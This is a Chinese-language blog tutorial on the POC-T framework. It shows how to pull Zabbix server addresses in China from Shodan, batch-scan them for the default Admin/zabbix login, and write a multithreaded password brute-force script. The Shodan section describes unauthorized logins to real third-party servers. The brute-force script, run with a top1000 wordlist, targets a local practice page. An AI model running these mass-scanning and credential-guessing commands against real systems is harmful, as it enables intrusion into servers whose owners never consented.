框架使用#
python2.7
环境使用
git clone https://github.com/Xyntax/POC-T
pip install -r requirement.txt
python POC-T.py:查看参数
常用参数:
- -s: 指定要使用
script
文件夹里面的哪个脚本 - -t: 指定线程数
- -iS: 指定单个目标,ip 或者域名都可以
- -iF: 指定多个目标 (文件),我们今天就用到这个参数
- -aZ/aS/aG/aF: 使用钟馗之眼 /shodan/google 开发者 /fofa 功能,使用这些需要先配置 toolkit.conf
- --limit: 在使用上面这些搜索引擎搜索数据时限定需要的目标数量
- --update: 更新 POC-T
解析 shodan 下载的数据#
shodan
搜索Zabbix country:"CN"
获得zabbix
数据,下载
cmd
里安装python
的shodan
模块解析下载下来的数据
(当然你也可以在命令行使用 shodan 直接进行搜索和下载数据)
pip install shodan
shodan parse --fields ip_str,port,org --separator , shodan-export.json_2.gz
shodan parse --fields ip_str,port --separator , shodan-export.json_2.gz > urls.txt
到处数据,打开urls.txt
替换,
为:
POC-T 使用脚本批量扫描弱密码#
python POC-T.py -s zabbix-weakpass -t 100 -iF urls.txt
可以看到4
年前的69
个结果,目前还剩5
个,使用弱密码Admin/zabbix
登录
登上去发现都是空的了,不过没关系,只是抛砖引玉:
POC-T 使用自己写的脚本#
可以参考官方脚本编写教程
编写自定义脚本,只需要声明一个函数作为接口,没有其他任何限制.从此告别文档,无需记忆函数名和模板调用,使效率最大化.
我这里以前几天写的文章BruteForce_test 暴力破解练习
的Level-1
为例子
安装http
请求转换插件http-script-generator
,请求右键
转换为python
的代码如下:
没有放在POC-T
框架里跑的效果如下:
那根据POC-T
脚本编写规则,脚本编写如下:
(最开始放在POC-T
框架里跑不出来,后面想了下是 python2.7 没有 format 等函数以及中文字符解码的问题)
# coding=utf-8
import requests
def poc(dict):
try:
paramsPost = {"name": "admin", "password": dict}
headers = {"Connection": "close"}
response = requests.post(
"http://192.168.1.11/BruteForc_test/Loginl.php", data=paramsPost, headers=headers)
if u"登陆成功" in response.content.decode('utf8'):
return "login success,password:" + dict
except:
return False
使用top1000
字典,设置10
进程破解:
python POC-T.py -s BruteForce_test -t 10 -iF top1000.txt
还有一个小问题,如何成功之后立马退出而不是等待所有字典跑完,后面我知道了会更新在这里
现在你就拥有了一个多线程异步的框架,不用担心线程管理的等问题,而且它还有很多内置的脚本库
于是乎之前一直拖欠的phpmyadmin
多线程爆破脚本也就迎刃而解了,我会更新到原文章里
参考文章:
本文完。